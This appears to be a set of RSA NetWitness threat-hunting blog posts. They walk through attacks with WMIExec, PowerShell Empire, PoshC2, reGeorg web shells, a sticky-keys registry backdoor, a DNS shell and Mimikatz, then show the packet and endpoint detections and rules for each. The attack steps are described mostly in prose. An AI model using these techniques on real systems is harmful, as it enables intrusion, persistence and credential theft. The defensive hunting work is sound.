NetWitness Packets can easily identify WMI remote execution. All the analyst needs to do is open the Indicators of Compromise (IOC) meta key and look for wmi command:

 

Pivoting on the wmi command metadata, and opening the Action meta key, the analyst can observe the commands that were executed, as these are sent in clear text:

 

NOTE: Not all WMI commands are malicious. It is up to the analyst to understand what is normal behaviour within their environment, and what is not. The commands seen above are typical of WMIExec however, and should raise concern for the analyst.

 

The following screenshot is of the raw data itself. Here it is possible to see the parameter that was passed and subsequently registered under the action meta key:

 

Looking at the parameter passed, it is possible to see that WMIExec uses CMD to execute its command and outputs the result to a file (named with the timestamp of execution) on the ADMIN$ share of the local system. The following screenshot shows an example of whoami being run, and the associated output file and its contents on the remote host:
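The output-file naming just described can be mirrored in a short, illustrative Python sketch. The helper names and share path below are hypothetical, written only to show the timestamp-based naming scheme and the matching detection substring; this is not Impacket's actual code:

```python
import time

# Illustrative sketch (not Impacket's actual code): wmiexec-style tooling
# redirects command output to a file on the ADMIN$ share whose name is
# derived from the execution timestamp, e.g. "__1612345678.9".
def output_share_path(ts: float) -> str:
    return r"\\127.0.0.1\ADMIN$\__" + str(ts)

# Detection analogue: flag parameters referencing the ADMIN$ share with
# the "__" timestamp prefix (current epoch timestamps begin with "1").
def looks_like_wmiexec_output(param: str) -> bool:
    return r"\127.0.0.1\admin$\__1" in param.lower()

path = output_share_path(time.time())
print(path, looks_like_wmiexec_output(path))
```

The `__1` prefix in the detection string mirrors the substring used in the application rule logic shown later in this post.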

 

NOTE: This file is removed after it has been successfully read and displayed back to the attacker. Evidence of this file only exists on the system for a small amount of time.

 

We can get a better understanding of WMIExec's function from viewing the source code:

 

To detect WMIExec activity in NetWitness Packets, the following application rule logic could be created to detect it:

action contains '127.0.0.1\\admin$\\__1'

Lateral traffic is seldom captured by NetWitness Packets. More often than not, the focus of packet capture is placed on the ingress and egress points of the network, normally due to high volumes of core traffic that significantly increase the cost of monitoring. This is why it is important to also have an endpoint detection product, such as NetWitness Endpoint, to detect lateral movement.

 

The Detection in NetWitness Endpoint

A daily activity for the analyst should be to check the Indicators of Compromise (IOC), Behaviours of Compromise (BOC), and Enablers of Compromise (EOC) meta keys. Upon doing so, the analyst would observe the following metadata, wmiprvse runs command shell:

 

Drilling into this metadata, and opening the Event Analysis view, it is possible to see the WMI Provider Service spawning CMD and executing commands:

 

To detect WMIExec activity in NetWitness Endpoint, the following application rule logic could be created to detect it:

param.dst contains '127.0.0.1\\admin$\\__1'

Conclusion

Understanding the Tactics, Techniques, and Procedures (TTPs) used by attackers, coupled with understanding how NetWitness interprets those TTPs, is imperative to identifying them within your network. The NetWitness suite has great capabilities to pull apart network traffic and pick up on anomalies, which makes it easier for analysts to hunt down and detect these threats.

 

WMI is a legitimate Microsoft tool used within environments by administrators, as well as by third-party products; it can therefore be difficult to differentiate normal use from malicious, which is why it is a popular tool for attackers. Performing threat hunting daily is an important activity for your analysts to build baselines and separate anomalous usage from normal activity.

There are a myriad of post exploitation frameworks that can be deployed and utilized by anyone. These frameworks are great to stand up as a defender to get an insight into what C&C (command and control) traffic can look like, and how to differentiate it from normal user behavior. The following blog post demonstrates an endpoint becoming infected, and the subsequent analysis in RSA NetWitness of the traffic from PowerShell Empire. 

 

The Attack

The attacker sets up a malicious page which contains their payload. The attacker can then use a phishing email to lure the victim into visiting the page. Upon the user opening the page, a PowerShell command is executed that infects the endpoint and is invisible to the end user:

 

 

The endpoint then starts communicating back to the attacker's C2. From here, the attacker can execute commands such as tasklist and whoami, as well as run other tools:

 

From here onward, the command and control would continue to beacon at a designated interval to check back for commands. This is typically what the analyst will need to look for to determine which of their endpoints are infected.

 

The Detection Using RSA NetWitness Network/Packet Data

The activity observed was only possible because the communication happened over HTTP. Had this been SSL, detection via packets would have been much more difficult. This is why introducing SSL Decryption/Interception/Offloading is highly recommended. SSL inspection devices are nothing more than a well-designed man-in-the-middle that breaks the encryption into two separate encrypted streams. They still provide an adequate level of protection to end-users while allowing security analysts and devices to properly monitor and alert when malicious or unwanted activity takes place, such as the C2 traffic shown here. In summary, if you are responsible for protecting your organization’s assets, you should definitely consider the pros and cons of using this technology.

 

The analyst begins their investigation by placing a focus on looking for C2 traffic over HTTP. The analyst can then look into pulling apart the characteristics of the protocol by using the Service Analysis meta key. From here, they notice a couple of interesting meta values to pivot on, http with binary and http post no get no referer directtoip:

 

Upon reducing the number of sessions to a more manageable number, the analyst can then look into other meta keys to see if there are any interesting artifacts. The analyst looks under the Filename, Directory, Client Application, and Server Application meta keys, and observes that the communication is always toward a microsoft-iis/7.5 server, from the same user agent, and toward a subset of PHP files:

 

The analyst decides to use this as a pivot point, and removes some of the other more refined queries, to focus on all communication toward those PHP files, from that user agent, and toward that IIS server version. The analyst now observes additional communication:

 

Opening up the visualization, the analyst can view the cadence of the communication and observes a beacon-type pattern:

 

Pivoting into the Event Analysis view, the analyst can look into a few more details to see if their suspicions of this being malicious are true. The analyst observes a low variance in payload size, and a connection taking place ~every 4 minutes:
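The two properties the analyst keys on here, a steady check-in cadence and low payload variance, can be expressed as a simple illustrative heuristic. The thresholds and function names below are assumptions for demonstration, not NetWitness logic:

```python
from statistics import mean, pstdev

# Hedged sketch: given (epoch_seconds, payload_bytes) pairs for sessions to a
# single host, flag beacon-like behaviour when inter-arrival times are nearly
# constant and payload sizes show low variance. Thresholds are illustrative.
def looks_like_beacon(sessions, jitter_tolerance=0.2):
    times = sorted(t for t, _ in sessions)
    sizes = [s for _, s in sessions]
    deltas = [b - a for a, b in zip(times, times[1:])]
    if len(deltas) < 3:
        return False  # too few sessions to judge cadence
    regular_cadence = pstdev(deltas) <= jitter_tolerance * mean(deltas)
    low_size_variance = pstdev(sizes) <= 0.1 * mean(sizes)
    return regular_cadence and low_size_variance

# ~4-minute check-ins with near-identical payload sizes, as observed above
sessions = [(0, 512), (242, 520), (481, 515), (722, 518), (960, 512)]
print(looks_like_beacon(sessions))
```

A real hunt would run this per source/destination pair over a longer window; the point is only that mechanical check-ins separate cleanly from interactive browsing on these two axes.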

 

The analyst reconstructs some of the sessions to see the type of data being transferred, and observes a variety of suspicious GETs and POSTs with varying data being transferred:

 

The analyst confirms this traffic is highly suspicious based off the analysis they have performed, and subsequently decides to track the activity with an application rule. To do this, the analyst looks through the metadata associated with this traffic, and finds a unique combination of metadata that identifies this type of traffic:

 

(service = 80) && (analysis.service = 'http1.0 unsupported cache header') && (analysis.service = 'http post missing content-type')

 

IMPORTANT NOTE: Application rules are very useful for tracking activity. They are however, very environment specific, therefore an application rule used in one environment, may be of high fidelity, but when used in another, could be incredibly noisy. Care should be taken when creating or using application rules to make sure they work well within your environment.

 

The Detection Using RSA NetWitness Endpoint Tracking Data

The analyst, as they should on a daily basis, is perusing the IOC, BOC, and EOC meta keys for suspicious activity. Upon doing so, they observe the metadata browser runs powershell and begin to investigate:

 

Pivoting into the Event Analysis view, the analyst can see that Internet Explorer spawned PowerShell, and subsequently the PowerShell that was executed:

 

The analyst decides to decode the base64 to get a better idea as to what the PowerShell is executing. The analyst observes the PowerShell is setting up a web request, and can see the parameters it would be supplying for said request. From here, the analyst could leverage this information and start looking for indicators of this in their packet data (this demonstrates the power behind having both Endpoint, and Packet solutions):
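PowerShell's -EncodedCommand takes base64 of a UTF-16LE string, so the analyst's decoding step is two operations. A minimal sketch, using an illustrative payload rather than the actual Empire stager:

```python
import base64

# Build an illustrative encoded command the way PowerShell would expect it:
# the script text is UTF-16LE encoded, then base64 encoded. This payload is
# a stand-in, not the real Empire stager.
script = "IEX (New-Object Net.WebClient).DownloadString('http://example/payload')"
encoded = base64.b64encode(script.encode("utf-16le")).decode()

def decode_powershell(b64: str) -> str:
    # Reverse the two layers: base64, then UTF-16LE
    return base64.b64decode(b64).decode("utf-16le")

print(decode_powershell(encoded))
```

Decoding with plain UTF-8 instead of UTF-16LE is a common mistake and produces text interleaved with NUL bytes, which is itself a useful tell that you are looking at an encoded PowerShell command.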

 

Pivoting in on the PowerShell that was launched, it is also possible to see the whoami and tasklist commands that were executed. This helps the analyst paint a picture of what the attacker was doing:

 

Conclusion

The traffic outlined in this blog post is of a default configuration of PowerShell Empire; the indicators may therefore differ depending on who sets up the instance. With that being said, C2s still need to check in, still need to deploy their payload, and still perform suspicious tasks on the endpoint. The analyst only needs to pick up on one of these activities to start pulling on a thread and unwinding the attacker's activity.

 

It is also important to note that PowerShell Empire network traffic is cumbersome to decrypt. It is therefore important to have an endpoint solution, such as NetWitness Endpoint, that tracks the activities performed on the endpoint for you.

 

Further Work

Rui Ataide has been working on a script to scrape Censys.io data looking for instances of PowerShell Empire. The attached Python script queries the Censys.io API looking for specific body request hashes, then subsequently gathers information surrounding the C2, including:

 

  • Hosting Server Information
  • The PS1 Script
  • C2 Information

 

Also attached is a sample output from this script with the PowerShell Empire metadata that has currently been collected.

Understanding how attackers may gain a foothold on your network is an important part of being an analyst. If attackers want to get into your environment, they typically will find a way. It is up to you to detect and respond to these threats as effectively and efficiently as possible. This blog post will demonstrate how a host became infected with PoshC2, and subsequently how the C&C (Command and Control) communication looks from the perspective of the defender.

 

The Attack

The attacker crafts a malicious Microsoft Word document that contains a macro with their payload. This document is sent to an individual in the organisation they want to attack, in the hope that the user will open the document and subsequently execute the macro within. The Word document attempts to trick the user into enabling macros by containing content like the below:

 

The user enables the content and doesn't see any additional content, but in the background the malicious macro executes and the computer is now part of the PoshC2 framework:

 

From here, the attacker can start to execute commands, such as tasklist, to view all currently running processes:

 

The attacker may also choose to set up persistence by creating a local service:

 

Preamble to Hunting

Prior to performing threat hunting, the analyst needs to assume a compromise and generate a hypothesis as to what they are looking for. In this case, the analyst is going to focus on hunting for C2 traffic over HTTP. This hypothesis dictates where they will look for that traffic, and which meta keys will help them achieve the desired result. Refining the approach toward threat hunting yields far greater results in detection: if analysts have a path to walk down, and can exhaust all possible avenues of that path before taking another route, the data set will be thoroughly sifted through in a methodical manner, with fewer distractions for the analyst.

 

The Detection Using Packet Data

Understanding how HTTP works is vital to detecting malicious C2 over HTTP. To become familiar with this, analysts should analyse HTTP traffic generated by malware alongside HTTP traffic generated by users; this allows the analyst to quickly determine what is out of place in a data set versus what seems to be normal. Blending in is a common strategy among malware authors: they want their traffic to resemble regular network communications and appear as innocuous as possible. But by their very nature, Trojans are programmatic and structured, and when examined, it becomes clear the communications hold no business value.

 

Taking the information above into account, the analyst begins their investigation by focusing on the protocol of interest at this point in time, HTTP. This one simple query quickly removes a large amount of the data set and allows the analyst to place an analytical lens on just the protocol of interest. This is not to say that the analyst will not look at other protocols, but at this point in time, and for this hunt, their focus is on HTTP:

 

Now the data set has been significantly reduced, but that reduction needs to continue. A great way of reducing the data set to interesting sessions is to use the Service Analysis meta key. This meta key contains metadata that pulls apart the protocol and details information about the session that can help the analyst distinguish between user behavior and automated malicious behavior. The analyst opens the meta key and focuses on a few characteristics of the HTTP session that s/he thinks make the traffic more likely to be of interest:

 

Let's delve into these a little, and find out why s/he picked them:

 

  • http no referer: An interactive session from a typical user browsing the web would mean the HTTP request should contain a Referer header with the address the user came from. More mechanical HTTP traffic typically will not have a Referer header.
  • http four or less headers: Typical HTTP requests from users browsing the web have seven or more HTTP headers; looking for sessions with a lower header count could therefore yield more mechanical HTTP requests.
  • http single request/response: A single TCP session can be used for multiple HTTP transactions, so if a typical user is browsing the web, you would expect to see multiple GETs and potentially POSTs within a single session. Placing a focus on HTTP sessions that only have a single request and response could therefore lead us to more mechanical behavior.
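The first two of these pivots can be sketched as a simple heuristic over a raw HTTP request. This is an illustrative re-implementation, not NetWitness parser logic; the single request/response check needs full-session context, so it is omitted here:

```python
# Illustrative heuristic mirroring the pivots above: flag a raw HTTP request
# that has no Referer header and four or fewer headers in total.
def suspicious_request(raw: str) -> bool:
    head = raw.split("\r\n\r\n", 1)[0]          # request line + headers
    lines = head.split("\r\n")
    headers = [l.split(":", 1)[0].strip().lower()
               for l in lines[1:] if ":" in l]   # skip the request line
    return "referer" not in headers and len(headers) <= 4

mechanical = "GET /a HTTP/1.1\r\nHost: 10.0.0.5\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
browser = ("GET /page HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0\r\n"
           "Accept: text/html\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n"
           "Referer: http://example.com/\r\nConnection: keep-alive\r\n\r\n")
print(suspicious_request(mechanical), suspicious_request(browser))
```

Neither condition is malicious on its own; as in the hunt above, they are filters that concentrate mechanical traffic for a human to review.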

 

There are a variety of other drills the analyst could have performed, but for now this will be sufficient for the path they want to take, as the data set has been reduced to a more manageable amount. While perusing the other available metadata, the analyst observes an IP communicating directly to another IP, with requests for a diverse range of resources:

 

Opening the visualization to analyse the cadence of the communication, the analyst observes there to be some beaconing type behavior:

 

 

Reducing the time frame, the beaconing is easier to see and appears to occur ~every 5 minutes:

 

Upon opening the Event Analysis view, the analyst can see the beacon pattern, which is happening roughly every 5 minutes. The analyst also observes a low variance in the payload size; this is indicative of mechanical check-in type behavior, which is exactly what the analyst was looking for:

 

Now that the analyst has found some interesting sessions, they can reconstruct the raw payload to see if there are further anomalies of interest. Browsing through the sessions, the analyst sees that the requests do not return any data, and are to random-sounding resources. This seems like some sort of check-in behavior:

 

The analyst comes back to the Events view to see if there are any larger sessions toward this IP, to get a better sense of whether any data is being sent back and forth. The analyst notices a few sessions that are larger than the others and decides to investigate them:

 

Reconstructing one of the larger sessions, the analyst can see a large chunk of base64 is being returned:

 

As well as POSTs with a suspicious base64-encoded Cookie header that does not conform to the RFC:

 

This seems to be the only type of data transferred between the two IPs and stands out as very suspicious. This should alert the analyst that this is most likely some form of C2 activity:

 

The base64-decoded data is encrypted, and therefore the analyst cannot simply decode it to find out the information being transferred.

 

THOUGHT: Maybe there is another way for us to get the key to decode this? Keep reading on!

 

The analyst has now found some suspicious activity; the next stage is to track it and see if it is happening elsewhere. This can easily be done using an application rule. The analyst identifies somewhat unique criteria for this traffic using the Investigation view, and converts that into an application rule; the following example would pick up on this activity and make it far easier for the analyst to track:

 

(service = 80) && (server = 'microsoft-httpapi/2.0') && (filename !exists) && (http.response = 'cachecontrol') && (resp.uniq = 'no-cache, no-store, must-revalidate') && query length 14-16

 

IMPORTANT NOTE: Before adding this application rule to the environment, it is important to note that the analyst thoroughly checked how many hits this logic would create in their environment before deploying. Application rules can work well in one environment, but can be very noisy in others.

 

It is also important to note that this application rule was generated for this specific environment and the traffic that was seen; not all PoshC2 traffic will look this way. It is up to the analyst to create application rules that suit their environment. Note also that the http.response and resp.uniq meta keys need to be enabled in the http_lua_options file, as they are not enabled by default.

 

The analyst creates the application rule, and pushes this to all available Decoders:

 

Upon doing so, the analyst sees the application rule creating metadata as expected, but also notices that there is another C2, and another host in their network infected by PoshC2:

 

This demonstrates the necessity of tracking activity on your network as and when it is found; it can uncover newly infected endpoints and allows you to track that activity easily.

 

From here, the analyst has multiple routes that they could take:

 

  • Perform OSINT (Open Source Intelligence) on the IP/activity in question; or
  • Investigate if there is a business need for this communication; or
  • Investigate the endpoint to see what is making the communication, and if there are any other suspicious indicators.

 

The Detection Using Endpoint Tracking

The analyst, while performing their daily activity of perusing IOCs (Indicators of Compromise), BOCs (Behaviors of Compromise), and EOCs (Enablers of Compromise) - observes a BOC that stands out as interesting to them, office application runs powershell:

 

Opening the Event Analysis view for this BOC, the analyst can better understand what document the user opened for this activity to happen. There are three events for this because the user opened the document three times, probably because they weren't seeing any content from the document after enabling the macros within it:

 

Opening the session itself, the analyst can see the whole raw payload of the PowerShell that was invoked from the Word document:

 

Running this through base64 decoding, the analyst can see that it is double base64 encoded, and the PowerShell has also been deflated, meaning more obfuscation was put in place:

 

Decoding the second set of base64 and inflating, the actual PowerShell that was executed can now be seen:
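The decoding chain the analyst followed (base64, base64 again, then inflation of the raw-deflate stream) can be sketched in Python. The payload below is an illustrative stand-in, not the actual PoshC2 stager, and the exact layering can vary between stagers:

```python
import base64, zlib

def deflate(data: bytes) -> bytes:
    # Raw deflate (negative wbits = no zlib header), matching what
    # PowerShell's DeflateStream produces.
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()

# Build an illustrative double-base64 + deflated payload
inner = base64.b64encode(deflate(b"Write-Host 'stager'"))
outer = base64.b64encode(inner).decode()

def decode_stager(b64: str) -> str:
    layer1 = base64.b64decode(b64)        # first base64 layer
    compressed = base64.b64decode(layer1) # second base64 layer
    return zlib.decompress(compressed, -15).decode()  # inflate raw deflate

print(decode_stager(outer))
```

The `-15` window-bits argument is the key detail: without it, `zlib.decompress` expects a zlib header that deflated PowerShell payloads do not have.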

 

Perusing the PowerShell, the analyst observes that there is a decode function within it. This function requires an IV and a KEY to successfully decrypt. This could be useful for decrypting the information seen in the packet data:

 

The analyst calculates the IV from the key which, according to the PowerShell, is the key itself minus the first 15 bytes; this is then converted to hex for ease of use:
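That derivation can be sketched as follows, using a hypothetical stand-in key (the real key is, of course, the one recovered from the PowerShell):

```python
import binascii

# Hedged sketch of the IV derivation described above: per the recovered
# PowerShell, the IV is the key with its first 15 bytes removed, then
# converted to hex for use in a decryption tool. This key is illustrative.
key = b"0123456789abcdefghijklmnopqrstu"  # 31 bytes, hypothetical stand-in

iv = key[15:]                              # drop the first 15 bytes -> 16-byte IV
iv_hex = binascii.hexlify(iv).decode()

print(len(iv), iv_hex)
```

A 16-byte IV is what a block cipher such as AES-CBC would expect, which is consistent with the decode function the analyst found.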

 

Now the analyst has the key and the IV, they can decrypt the information they previously saw in the packets. The analyst navigates back to the packets and finds a session that contains some base64:

 

Using the newly identified information retrieved via the endpoint tracking, the analyst can now start to decode the information and see exactly what commands and data were sent to the C2:

 

Some of which can be incredibly beneficial, such as the below, which lists all the URLs this C2 will use:

 

The analyst also wants to find out if any other interesting activity was taking place on the endpoint; upon perusing the BOC meta key, the analyst spots the metadata creates suspicious service running command shell:

 

The analyst opens the sessions in the Event Analysis view, and can see that PowerShell spawned sc.exe to create a suspicious-looking service called CPUpdater:

 

This is the persistence mechanism chosen by the attacker. The analyst now has the full PowerShell command and can base64 decode it to confirm these assumptions:

 

 

 

Conclusion

Understanding the nuances between user-based behavior and mechanical behavior gives an advantage to the analyst performing threat hunting. If analysts understand what "normal" looks like within their environment, they can easily discern it from abnormal behaviors.

 

It is also important to note the advantages of having endpoint tracking data in this scenario. Without the endpoint tracking data, the original document with the malicious PowerShell may not have been recoverable, and therefore the decryption of the information between the C2 and the endpoint would not have been possible; both tools heavily complement one another in creating the full analytical picture.

Attackers are continuously evolving in order to evade detection. A popular method often utilized is encoding. An attacker may choose, for example, to encode their malicious binaries in order to evade detection; attackers can use a diverse range of techniques to achieve this, but in this post we are focusing on an example of a hex-encoded executable. The executable chosen for this example was not malicious, but a legitimate signed Microsoft binary.

 

This method of evading detection was observed in the wild by the RSA Incident Response team. Due to the close relationship between the Incident Response Team and RSA's Content Team, a request for this content was submitted by IR, and was published to RSA Live yesterday. The following post demonstrates the Incident Response team testing the newly developed content.

 

The Microsoft binary was converted to hexadecimal and uploaded onto Pastebin, which is an example of what attackers are often seen doing:  

 

A simple PowerShell script was written to download and decode the hexadecimal encoded executable and save it to the Temp directory:

 

Typically, the above PowerShell would be Base64 encoded and the IR team would normally see something like the below:

 

After executing the PowerShell script, it is possible to see that dllhost.exe was successfully decoded and saved into the Temp directory:
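The decode step itself is trivial to reproduce. An illustrative Python equivalent, using a stub payload rather than the real binary, hex-decodes the blob and sanity-checks the PE "MZ" header:

```python
# Illustrative equivalent of the decode step above: turn the hex-encoded
# blob back into bytes and sanity-check the PE "MZ" magic before treating
# it as an executable. The payload here is a stub, not a real binary.
hex_blob = "4d5a90000300000004000000ffff0000"  # start of a PE header, hex-encoded

decoded = bytes.fromhex(hex_blob)
is_pe = decoded[:2] == b"MZ"

print(is_pe)
```

This also illustrates why content that detects hex-encoded executables works: the encoded form of the `MZ`/PE header (`4d5a...`) is itself a stable substring to look for in the downloaded text.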

 

Upon perusing the packet metadata, the analyst would be able to easily spot the download of this hex encoded executable by looking under the Indicator of Compromise key:

 

Conclusion

It is important to always keep the RSA NetWitness platform up to date with the latest content. RSA Live allows analysts to subscribe to content, as well as receive updates on when newly developed content is available. For more information on setting up RSA Live, please see: Live: Create Live Account 

This blog post is a follow on from the following two blog posts:

 

 

 

The Attack

The attacker is not happy with executing commands via the Web Shell, so she decides to upload a new Web Shell called reGeorg (https://sensepost.com/discover/tools/reGeorg/). This Web Shell allows the attacker to tunnel other protocols over HTTP, meaning the attacker could, for example, RDP directly onto the Web Server, even though RDP isn’t directly allowed from the internet.

 

The attacker can upload the Web Shell via one of the previously utilized Web Shells:

 

The attacker can now check that the upload was successful by navigating to the uploaded JSP page. If all is okay, the Web Shell returns the message shown in the below screenshot:

 

The attacker can now connect to the reGeorg Web Shell:

 

The attacker now has remote access to anything accessible from the Web Server where the Web Shell is located. This means the attacker could choose, for example, to RDP to a previously identified machine:

 

Attackers also like to keep other access methods to endpoints; one way of doing this is to set up an accessibility backdoor. This involves the attacker altering a registry key to load CMD when another application executes - in this case sethc.exe, the accessibility feature you typically see when pressing the SHIFT key five times. This means that anyone who can RDP to that machine can receive a system-level command prompt with no credentials required; sethc.exe can be invoked at the login screen by pressing the SHIFT key five times, and with the registry key altered, it will spawn CMD as well.

 

To set this up, the attacker can use the Web Shell, and perform this over WMI using REG ADD:

 

Now the attacker can RDP back to the host where they just set up the accessibility backdoor, press the SHIFT key five times to initiate sethc.exe, and be given a command prompt as SYSTEM without having to use credentials:

 

 

The Analysis in RSA NetWitness

The analyst, while perusing Behaviors of Compromise, observes some suspicious indicators, runs wmi command-line tool, creates remote process using wmi command-line tool, and http daemon runs command shell just to name a few:

 

Drilling into the WMI related metadata, it is possible to see the WMI lateral movement that was used to setup the accessibility backdoor from the Web Shell:

 

The analyst also observes some interesting hits under the Indicators of Compromise meta key, enables login bypass and configures image hijacking:

 

Drilling into these sessions, we can see they are related to the WMI lateral movement performed, but this event is from the endpoint the backdoor was set up on:

 

The analyst, further perusing the metadata, drills into the Behavior of Compromise metadata gets current username, and can see the sticky keys backdoor being used (represented by sethc.exe 211) to execute whoami:

 

The analyst, also perusing HTTP network traffic, observes HTTP headers that they typically do not see: x-cmd, x-target, and x-port:

 

Drilling into the RAW sessions for these suspicious headers, it is possible to see the command sent to the Web Shell to initiate the RDP connection:

 

Further perusing the HTTP traffic toward tunnel.jsp, we can see the RDP traffic being tunnelled over HTTP requests. This shows as HTTP rather than RDP because the RDP traffic is encapsulated within HTTP; the session therefore exhibits more characteristics of HTTP than of RDP:

 

Conclusion

Attackers will leverage a diverse range of tools and techniques to ensure they keep access to the environment they are interested in. The tools and techniques used here are freely available online and are often seen utilized by advanced attackers; performing proactive threat hunting will ensure that these types of events do not go unnoticed within your environment.

Following up from the previous blog, Web Shells and RSA NetWitness, the attacker has since moved laterally. Using one of the previously uploaded Web Shells, the attacker confirms permissions by running whoami, and checks the running processes using tasklist. Attackers, like most individuals, are creatures of habit:

 

The attacker also executes a quser command to see if any users are currently logged in, and notices that an RDP session is currently active:

 

The attacker executes a netstat command to see where the RDP session has been initiated from and finds the associated connection:

 

The attacker pivots to her Kali Linux machine and sets up a DNS Shell. This DNS Shell will allow the attacker to set up C&C on the new machine she has just discovered:

 

The attacker moves laterally using WMI, and executes the encoded PowerShell command to setup the DNS C&C:

 

The DNS Shell is now set up and the attacker can begin to execute commands, such as whoami, on the new machine through the DNS Shell:

 

Subsequently, as the attacker likes to do, she also runs a tasklist through the DNS Shell:

 

Finally, the attacker confirms that the host has internet access by pinging www.google.com:

 

As the attacker has confirmed internet access, she decides to download Mimikatz using a PowerShell command:

 

The attacker then performs a dir command to check if Mimikatz was successfully downloaded:

 

From here, the attacker can dump credentials from this machine and continue to move laterally around the organisation, as well as pull down new tools to achieve her task(s). The attacker has also set up a failover (the DNS Shell) in case the Web Shells are discovered and subsequently removed.

 

 

 

Analysis

Since the previous post, the analyst has upgraded their system to NetWitness 11.3 and deployed the new agents to their endpoints. The tracking data now appears in the NetWitness UI, and subsequently the analysis will take place solely in the 11.3 UI.

 

Tracking Data

The analyst, upon perusing the metadata, uncovers some reconnaissance commands being executed, whoami.exe and tasklist.exe, on two of their endpoints:

 

Refocusing their investigation on those two endpoints, and exposing the Behaviours of Compromise (BOC) meta key, the analyst uncovers some suspect indicators that relate to a potential compromise: creates remote process using wmi command-line tool, http daemon runs command shell, and runs powershell using encoded command, just to name a few:

 

Pivoting into the sessions related to, creates remote process using wmi command-line tool, the analyst observes the Tomcat Web Server performing WMI lateral movement on a remote machine:

 

The new 11.3 version stores the entire Encoded PowerShell command and performs no truncation:

 

This allows the analyst to perform Base64 decoding directly within the UI using the new Base64 decode function (NOTE: the squares in between each character are due to double byte encoding and not a byproduct of NetWitness decoding):
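As a side note, PowerShell's -EncodedCommand takes Base64 of UTF-16LE text, which is why a naive single-byte decode shows a null byte (rendered as a square) between each character. A minimal sketch of both decodes, using a hypothetical encoded command rather than the one captured in this incident:

```python
import base64

# Hypothetical -EncodedCommand value: Base64 over UTF-16LE text.
# This is illustrative, not the command captured in this incident.
encoded = base64.b64encode("whoami".encode("utf-16le")).decode()

raw = base64.b64decode(encoded)
print(raw)                     # b'w\x00h\x00o\x00a\x00m\x00i\x00' - nulls between characters
print(raw.decode("utf-16le"))  # whoami
```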

  

 

Navigating back to the metadata view, the analyst opens the Indicators of Compromise (IOC) meta key and observes the metadata, drops credential dumping library:

 

Pivoting into those sessions, the analyst sees that Mimikatz was dropped onto the machine that was previously involved in the WMI lateral movement:

 

Packet Data

The analyst is also looking into the packet data, searching through DNS after noticing an increase over the amount of traffic they typically see. Upon opening the SLD (Second Level Domain) meta key, the culprit of the increase is shown:

 

Focusing the search on the offending SLD, and expanding the Hostname Alias Record (alias.host) meta key, the analyst observes a large number of suspicious unique FQDNs:

 

This is indicative behaviour of a DNS tunnel. Focusing on the DNS Response Text meta key, it is also possible to see the commands that were being executed:

 

We can further substantiate that this is a DNS tunnel by using a tool such as CyberChef: taking the characters after cmd in the FQDN and hex decoding them reveals that data is sent hex encoded as part of the FQDN itself, in chunks that are reconstructed on the attacker side, due to the restriction on how much data can be sent via DNS:
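The same decode that CyberChef performs can be sketched in a few lines of Python. The FQDN layout used here (a hex payload in the label after the cmd marker) is a simplified assumption for illustration, not the exact scheme used by this DNS Shell:

```python
# Decode the hex-encoded payload carried inside a DNS tunnel label.
# Assumed (illustrative) FQDN layout: cmd.<hexdata>.<attacker-domain>
fqdn = "cmd.77686f616d69.attacker-domain.example"

labels = fqdn.split(".")
hex_chunk = labels[1]  # the label following the "cmd" marker
decoded = bytes.fromhex(hex_chunk).decode("ascii")
print(decoded)  # whoami
```

In real traffic each query would carry only a small chunk of the output, so the attacker-side tooling concatenates the decoded chunks across many queries.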

 

 

ESA Rule

DNS-based C&C is noisy because only a finite amount of information can be sent with each DNS packet, so returning information from the infected endpoint requires a large amount of DNS traffic. The DNS requests made also need to be unique, so as not to be answered by the local DNS cache or internal DNS servers. Due to this high level of noise from the DNS C&C communication, and the variance in the FQDN, it is possible to create an ESA rule that looks for DNS C&C with a high degree of fidelity.

The ESA rule attached to this blog post calculates a ratio of how many unique alias host values there are toward a single Second Level Domain (SLD): we count the number of sessions toward the SLD and divide that by the number of unique alias hosts for that SLD, giving us a ratio:

 

  • SLD Session Count ÷ Unique Alias Host Count = ratio

 

The lower the ratio, the more likely this is to be a DNS tunnel, due to the high connection count and the variance in the FQDN toward a single SLD. The below screenshot shows the output of this rule, which triggered on the SLD shown in the analysis section of this blog post:
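The ratio logic can be prototyped outside of ESA in a few lines of Python to see why a tunnel scores low; the session data below is illustrative, not taken from this incident:

```python
from collections import defaultdict

# (sld, alias_host) pairs as a Decoder might produce them (illustrative data):
# the tunnel domain has a unique FQDN per session, the benign domain does not.
sessions = [
    ("tunnel-domain.example", "a1f3.cmd.tunnel-domain.example"),
    ("tunnel-domain.example", "b2c4.cmd.tunnel-domain.example"),
    ("tunnel-domain.example", "d5e6.cmd.tunnel-domain.example"),
    ("google.com", "www.google.com"),
    ("google.com", "www.google.com"),
    ("google.com", "mail.google.com"),
]

counts = defaultdict(int)    # sessions per SLD
uniques = defaultdict(set)   # unique alias hosts per SLD
for sld, host in sessions:
    counts[sld] += 1
    uniques[sld].add(host)

for sld in counts:
    # SLD session count / unique alias host count - lower means more tunnel-like
    ratio = counts[sld] / len(uniques[sld])
    print(sld, ratio)  # tunnel-domain.example -> 1.0, google.com -> 1.5
```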

 

 

NOTE: Legitimate products, such as McAfee, ESET, and TrendMicro, perform DNS tunnelling. These domains would need to be filtered out based on what you observe in your environment. The filtering option for domains is at the top of the ESA rule.

 

The rule for import, and the pure EPL code in a text file, are attached to this blog post.

IMPORTANT: SLD needs to be set as an array for the rule to work.

 

 

Conclusion

This blog post was written to further demonstrate the TTPs (Tactics, Techniques, and Procedures) attackers may utilise in a compromise to achieve their end goal(s). It demonstrates the necessity for proactive threat hunting, as well as the necessity for both Packet and Endpoint visibility to succeed in said hunting. It also demonstrates that certain aspects of hunting can be automated, but only after fully understanding the attack itself; this is not to say that all threat hunting can be automated, as a human element is always needed to confirm whether something is definitely malicious, but automation can minimise some of the work the analyst needs to do.

This blog also focused on the new 11.3 UI. This allows analysts to easily switch between packet data and endpoint data in a single pane of glass; increasing efficiency and detection capabilities of the analysts and the platform itself.

Introduction

This blog post demonstrates a common method by which organisations can get compromised. Initially, the viewpoint will be from the attacker's perspective; it will then move on to show what artifacts are left within the RSA NetWitness Packets and RSA NetWitness Endpoint solutions that analysts could use to detect this type of activity.

 

Scenario

An Apache Tomcat server exposed to the internet with weak credentials for the Tomcat Manager App gets exploited by an attacker. The attacker uploads three Web Shells, confirms access to all of them, and then uploads Mimikatz to dump credentials.

 

Definitions

Web Shells

